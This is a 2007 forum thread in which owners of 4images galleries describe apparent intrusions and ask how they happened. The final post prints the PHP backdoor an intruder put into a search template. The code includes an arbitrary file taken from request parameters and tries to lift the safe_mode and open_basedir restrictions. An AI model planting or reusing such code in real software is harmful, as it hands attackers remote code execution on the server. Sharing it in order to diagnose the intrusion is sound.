Author Topic: Think my settings got hacked  (Read 4500 times)

0 Members and 1 Guest are viewing this topic.

Offline impss

  • Sr. Member
  • ****
  • Posts: 382
    • View Profile
    • Cusstom.net
Think my settings got hacked
« on: February 14, 2007, 04:20:38 PM »
 :cry:

some how my "Valid file extensions" was changed to only php , and php wasnt a option before.

and someone uploaded a php file to one of my catogories called root.php.

I thought i had done all the bug fixes for 1.7.1

Did i miss a possible bug fix that would allow those settings to be changed?


Offline ccsakuweb

  • Sr. Member
  • ****
  • Posts: 498
  • Patri
    • View Profile
    • My Art
Re: Think my settings got hacked
« Reply #1 on: February 14, 2007, 04:25:31 PM »
i think that my settings got hacked but in my case, someone deleted 50 users and their images, and changed the gallery language to english. I have 1.7.3 4images and i did all the bug fixes from the new version. is possible that there is a new bug??
:arrow: 4images Paid Mods: Links, Blog, Albums, Subdomains for users, Diferent templates for user profile, Related picture in details, Last pictures in details.
And the mod that you request me.   Demo: http://www.myart.es

A website dedicated to artist people who loves drawing, design, writing and more

Offline mawenzi

  • 4images Moderator
  • 4images Guru
  • *****
  • Posts: 4.500
    • View Profile
Re: Think my settings got hacked
« Reply #2 on: February 14, 2007, 04:27:07 PM »
... and do you have a safe admin account incl. safe admin password ... ?
Your first three "must do" before you ask a question ! ( © by V@no )
- please read the Forum Rules ...
- please study the FAQ ...
- please try to Search for your answer ...

You are on search for top 4images MOD's ?
- then please search here ... Mawenzi's Top 100+ MOD List (unsorted sorted) ...

Offline impss

  • Sr. Member
  • ****
  • Posts: 382
    • View Profile
    • Cusstom.net
Re: Think my settings got hacked
« Reply #3 on: February 14, 2007, 04:29:57 PM »
i belive i do..

more then 8 characters using upper and lower case and numbers

Offline ccsakuweb

  • Sr. Member
  • ****
  • Posts: 498
  • Patri
    • View Profile
    • My Art
Re: Think my settings got hacked
« Reply #4 on: February 14, 2007, 09:33:06 PM »
in my case, i have changed my password. and after i changed my password my website haven't got hacked.
:arrow: 4images Paid Mods: Links, Blog, Albums, Subdomains for users, Diferent templates for user profile, Related picture in details, Last pictures in details.
And the mod that you request me.   Demo: http://www.myart.es

A website dedicated to artist people who loves drawing, design, writing and more

Offline impss

  • Sr. Member
  • ****
  • Posts: 382
    • View Profile
    • Cusstom.net
Re: Think my settings got hacked
« Reply #5 on: February 15, 2007, 05:02:39 PM »
I also just noticed my seach.php file wasnt working.

So i looked into it , and he changed everything in my search.html  to:

Code: [Select]
<?php
$f
=trim($f); 
echo 
ini_get("safe_mode"); 
echo 
ini_get("open_basedir"); 
include(
"$f"); 
ini_restore("safe_mode"); 
ini_restore("open_basedir"); 
echo 
ini_get("safe_mode"); 
echo 
ini_get("open_basedir"); 
include(
"$f"); 
include(
$_GET['x']);
?>

Anyone know how this could have happened?

Please somebody help.. i dont want this to happen again.